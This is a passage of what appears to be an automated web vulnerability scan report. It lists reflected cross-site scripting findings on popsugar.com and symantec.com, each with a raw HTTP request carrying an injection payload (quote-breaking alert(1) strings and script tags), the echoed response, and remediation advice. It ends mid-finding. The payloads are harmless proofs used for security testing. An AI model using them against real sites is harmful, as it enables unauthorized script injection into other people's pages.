GET /ajaxharness1274b"-alert(1)-"faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 216634
Date: Mon, 12 Sep 2011 12:48:06 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831686%7CpkptR%2FA9J%2FIqOT1%2FNXZ2n3QzQ3z9KzL8JzqNOXzhPCUOXdBu6NS1b%2F3LUa8GKOLImxVmk7YfvLibUFzSqe5Q%2B7%2BoVuuMa7MtnWxeLZvLkI0rcDOFt58RkZNzXW2qbFry5plWRfKYqFDBw4BBEwsyl3s5Am93doYXCHQyo1EcDOCL1roLiKJwo2kG02GMlhGxN7k3D4PUL585q5xETKDblw%3D%3D%7C429f67101424c290012240d8a56cca4712884354; expires=Wed, 05-Oct-2011 16:21:26 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/ajaxharness1274b"-alert(1)-"faa5baba69b",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...
2.133. http://www.popsugar.com/community/welcome [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71fc3"-alert(1)-"b26aaabc6d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community71fc3"-alert(1)-"b26aaabc6d1/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 214880
Date: Mon, 12 Sep 2011 12:48:13 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831693%7Cr9dhWypY6jg0x26vr4FaUOqhCsFOKHx5a%2Bq2ZDd%2BTfxw08HKOoJMNBXIB2hhcFDYnBzwi8s3IVNfYgNmYEw%2BLksmQfw08uQ6pxsGEBhnj9JcmGg5BFRhwDUwk88E51%2BnDwBluagi98uxF2qU8Lcnq%2BREdgQf3pT2oh7xtrjQAcl9H8hYmTA%2FNyOK2rW22dQT%2B5nTWh2raVfAbMmHLd%2Fk%2BQ%3D%3D%7C7aa075b627ef874e5acd15c901cd009ba793cf8b; expires=Wed, 05-Oct-2011 16:21:33 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/community71fc3"-alert(1)-"b26aaabc6d1/welcome",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...
2.134. http://www.popsugar.com/community/welcome [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dc10"><script>alert(1)</script>52e78853112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community8dc10"><script>alert(1)</script>52e78853112/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web019-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 215025
Date: Mon, 12 Sep 2011 12:48:11 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831691%7CEDANpUBXj7Tgv43AmGrEhzEQXWyNeG0H2zRof%2FnyvlEl%2BPoC%2FCdYmxgnkumTYWRDyf16qQRZZWKmfWgsLDfCNJztLyezVjGPrXBnIdPU%2FijnixGFkQYw17y9MdoPtfcAKuYEXGj1y6pmNeONBafiaAclYS69eompF4MBmzqpl6ELuA2SXF9YYcuAaG5rOfCALG8nlaGApmcVl%2FDZLDHLpw%3D%3D%7Cdc8ded20b853356648daf3e5c9a44561e3044fcd; expires=Wed, 05-Oct-2011 16:21:31 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community8dc10"><script>alert(1)</script>52e78853112/welcome">
...[SNIP]...
2.135. http://www.popsugar.com/community/welcome [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9aea"-alert(1)-"a554c76626d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/welcomef9aea"-alert(1)-"a554c76626d HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 149935
Date: Mon, 12 Sep 2011 12:49:00 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831740%7CPBu6CHBL%2BNPiJ%2BO0b88VGrbPoavruFNqnmlHvuiyu5RAZ8RbrX4MARzW6UPUI4XAzUuUWIKcevcUd75sOIG7vbWCJmfKPIEgOL7cKSF5iS4%2FtvU79e%2BjOKK3juIM7eHeBEDUqSSYOB%2Bm3H7BlJevZtX6AFsSQFzsbM7h9PjEi57L3o59zDb70XFiwzNQNbEBhkqvX%2F5U2G%2B34iy8gxYO4g%3D%3D%7C6dabb54501a683def6c8a84c7f24d6fa0e681d28; expires=Wed, 05-Oct-2011 16:22:20 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/community/welcomef9aea"-alert(1)-"a554c76626d",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...
2.136. http://www.popsugar.com/community/welcome [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e939"><script>alert(1)</script>5f0bb92b79e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/welcome4e939"><script>alert(1)</script>5f0bb92b79e HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 150250
Date: Mon, 12 Sep 2011 12:48:23 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831703%7CoAutIUEcXq6bCNfw74vX3a0be04ZbR4xtUo1MkM2Wd11jXYyJcUAEBZW4wg1XBM9frctMhBcgKvcWELTBl%2FmSMz8iU8UXP3HuedsTL3oNeYUELTy8uSkwVNdGNj8TtYYoOq1UoQzUrLsQjAK6FKYwd2IUdA5MzeD0wF3ZgDFwzcJUej1ChSFZzPRc1Svasm3z2LxMdUMOWcSToydDAcpMg%3D%3D%7Cce8ce4960372de566ad8f2cb9b30c00a80876c77; expires=Wed, 05-Oct-2011 16:21:43 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community/welcome4e939"><script>alert(1)</script>5f0bb92b79e">
...[SNIP]...
2.137. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de3fe'-alert(1)-'2de55c2ee7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sitesde3fe'-alert(1)-'2de55c2ee7c/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:14 +0000
Vary: Cookie
ETag: "1315831694"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777241
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesde3fe'-alert(1)-'2de55c2ee7c/default/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...
2.138. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85ada'-alert(1)-'a74af1a6694 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default85ada'-alert(1)-'a74af1a6694/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:18 +0000
Vary: Cookie
ETag: "1315831698"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777346
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default85ada'-alert(1)-'a74af1a6694/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...
2.139. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b374'-alert(1)-'f947be7dc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes4b374'-alert(1)-'f947be7dc9/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:22 +0000
Vary: Cookie
ETag: "1315831702"
Content-Type: text/html; charset=utf-8
Content-Length: 29494
X-Varnish: 1371255077
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes4b374'-alert(1)-'f947be7dc9/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...
2.140. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e5b9'-alert(1)-'74a67864f83 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect28e5b9'-alert(1)-'74a67864f83/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:28 +0000
Vary: Cookie
ETag: "1315831708"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777530
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect28e5b9'-alert(1)-'74a67864f83/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...
2.141. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d05b9'-alert(1)-'cfeabf464ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/imagesd05b9'-alert(1)-'cfeabf464ec/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:32 +0000
Vary: Cookie
ETag: "1315831712"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777597
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/imagesd05b9'-alert(1)-'cfeabf464ec/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...
2.142. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69951'-alert(1)-'8f65520acae was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico69951'-alert(1)-'8f65520acae HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:36 +0000
Vary: Cookie
ETag: "1315831716"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777663
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1800
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
